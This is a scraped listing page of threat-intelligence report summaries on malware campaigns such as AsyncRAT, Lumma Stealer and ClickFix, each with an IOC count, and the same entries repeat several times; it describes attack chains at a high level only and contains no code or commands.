Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33